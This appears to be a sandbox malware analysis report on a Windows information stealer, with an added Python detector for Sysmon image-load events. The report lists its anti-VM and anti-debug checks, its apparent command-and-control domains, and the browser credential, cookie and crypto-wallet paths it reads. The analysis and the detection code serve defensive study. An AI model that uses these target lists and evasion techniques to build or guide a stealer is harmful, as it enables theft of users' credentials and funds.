Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00632C9C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
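The "Section loaded" rows above are the capability footprint of the payload rather than of the folder2iso utility named by the PDB path and OriginalFilename: winhttp.dll, webio.dll and schannel.dll for TLS egress, dpapi.dll and ncrypt.dll for the DPAPI work behind the browser-credential harvesting, wbemcomn.dll for the WMI antivirus check the report lists, plus amsi.dll. As an added example that is not part of this report or of Joe Sandbox, the following Python groups Sysmon Event ID 7 (ImageLoad) records per process and flags any process outside an allowlist that loads all three families in one lifetime. The JSON field names follow Sysmon's event schema as exported by Winlogbeat (assumption), the family lists and the allowlist are assumptions to tune, and the event lines are constructed.

```python
import json

# Module families taken from the report's "Section loaded" rows. Each family is
# one capability; an unexpected process that needs all three at once (TLS egress,
# DPAPI decryption, WMI queries) fits a credential stealer. Assumption: tune per estate.
FAMILIES = {
    "net":   {"wininet.dll", "winhttp.dll", "schannel.dll", "webio.dll"},
    "dpapi": {"dpapi.dll"},
    "wmi":   {"wbemcomn.dll", "wbemprox.dll", "wbemsvc.dll"},
}

# Images for which this combination is routine (assumption: illustrative allowlist).
EXPECTED_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "svchost.exe",
                   "wmiprvse.exe", "explorer.exe"}


def basename(path):
    """Case-folded file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def load_profiles(event_lines):
    """Group Sysmon Event ID 7 JSON lines by ProcessGuid -> (image, {loaded dlls}).

    Only EventID, ProcessGuid, Image and ImageLoaded are read; other events are skipped.
    """
    profiles = {}
    for line in event_lines:
        ev = json.loads(line)
        if ev.get("EventID") != 7:
            continue
        image, dlls = profiles.setdefault(ev["ProcessGuid"], (basename(ev["Image"]), set()))
        dlls.add(basename(ev["ImageLoaded"]))
    return profiles


def stealer_like(profiles):
    """[(guid, image, sorted family names)] for non-allowlisted processes that
    loaded at least one DLL from every family."""
    hits = []
    for guid, (image, dlls) in profiles.items():
        fams = sorted(f for f, names in FAMILIES.items() if dlls & names)
        if len(fams) == len(FAMILIES) and image not in EXPECTED_IMAGES:
            hits.append((guid, image, fams))
    return sorted(hits)


def _ev(guid, image, dll):
    return json.dumps({"EventID": 7, "ProcessGuid": guid, "Image": image, "ImageLoaded": dll})


# Constructed sample events (not from the report): A mirrors the sample's load
# sequence, B is a browser loading the same modules, C is an unrelated process.
A = "{A1000000-0000-0000-0000-000000000001}"
B = "{B1000000-0000-0000-0000-000000000002}"
C = "{C1000000-0000-0000-0000-000000000003}"
SAMPLE_EVENTS = [
    _ev(A, r"C:\Users\user\Desktop\6RVmzn1DzL.exe", r"C:\Windows\SysWOW64\winhttp.dll"),
    _ev(A, r"C:\Users\user\Desktop\6RVmzn1DzL.exe", r"C:\Windows\SysWOW64\schannel.dll"),
    _ev(A, r"C:\Users\user\Desktop\6RVmzn1DzL.exe", r"C:\Windows\SysWOW64\dpapi.dll"),
    _ev(A, r"C:\Users\user\Desktop\6RVmzn1DzL.exe", r"C:\Windows\SysWOW64\wbemcomn.dll"),
    _ev(A, r"C:\Users\user\Desktop\6RVmzn1DzL.exe", r"C:\Windows\SysWOW64\amsi.dll"),
    _ev(B, r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Windows\System32\winhttp.dll"),
    _ev(B, r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Windows\System32\dpapi.dll"),
    _ev(B, r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Windows\System32\wbemcomn.dll"),
    _ev(C, r"C:\Windows\System32\notepad.exe", r"C:\Windows\System32\winhttp.dll"),
]

if __name__ == "__main__":
    for guid, image, fams in stealer_like(load_profiles(SAMPLE_EVENTS)):
        print(f"{image} {guid}: loads {', '.join(fams)}")
```

The allowlist is deliberately by image name only; in production key it on the signer and path of the process image, because a stealer dropped as chrome.exe in a user-writable directory would otherwise pass.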

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe TID: 2352 | Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_006410FF FindFirstFileW
Source: Amcache.hve.5.dr | Binary or memory string: VMware
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B33000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.5.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 6RVmzn1DzL.exe, 00000000.00000002.2398263626.000000000123E000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000123E000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000002.2398263626.000000000120E000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134170058.000000000123E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.5.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.5.dr | Binary or memory string: vmci.sys
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B33000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.5.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.5.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr | Binary or memory string: VMware, Inc.
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.5.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.5.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.5.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.5.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin`
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.5.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.5.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.5.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | API call chain: ExitProcess graph end node (graph_0-39585)
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_03208120 LdrInitializeThunk
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_0063B365 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D904C7 mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D90A87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D910D7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D910D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_02D90E37 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00633A58 GetProcessHeap
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_00633576 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_0063359E SetUnhandledExceptionFilter,UnhandledExceptionFilter

              HIPS / PFW / Operating System Protection Evasion

              Source: 6RVmzn1DzL.exe String found in binary or memory: potterryisiw.shop
              Source: 6RVmzn1DzL.exe String found in binary or memory: foodypannyjsud.shop
              Source: 6RVmzn1DzL.exe String found in binary or memory: contintnetksows.shop
              Source: 6RVmzn1DzL.exe String found in binary or memory: penetratedpoopp.xyz
              Source: 6RVmzn1DzL.exe String found in binary or memory: ellaboratepwsz.xyz
              Source: 6RVmzn1DzL.exe String found in binary or memory: swellfrrgwwos.xyz
              Source: 6RVmzn1DzL.exe String found in binary or memory: towerxxuytwi.xyz
              Source: 6RVmzn1DzL.exe String found in binary or memory: pedestriankodwu.xyz
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe Code function: 0_2_006342BA GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006342BA
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe Code function: 0_2_00638694 __lock,____lc_codepage_func,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00638694
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
              Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: 6RVmzn1DzL.exe PID: 3276, type: MEMORYSTR
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134709895.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "p": "%appdata%\\Electrum\\wallets",
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134709895.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "p": "%appdata%\\ElectronCash\\=
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Liberty
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185121742.000000000125A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185121742.000000000125A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000123E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185121742.000000000125A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134170058.000000000123E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
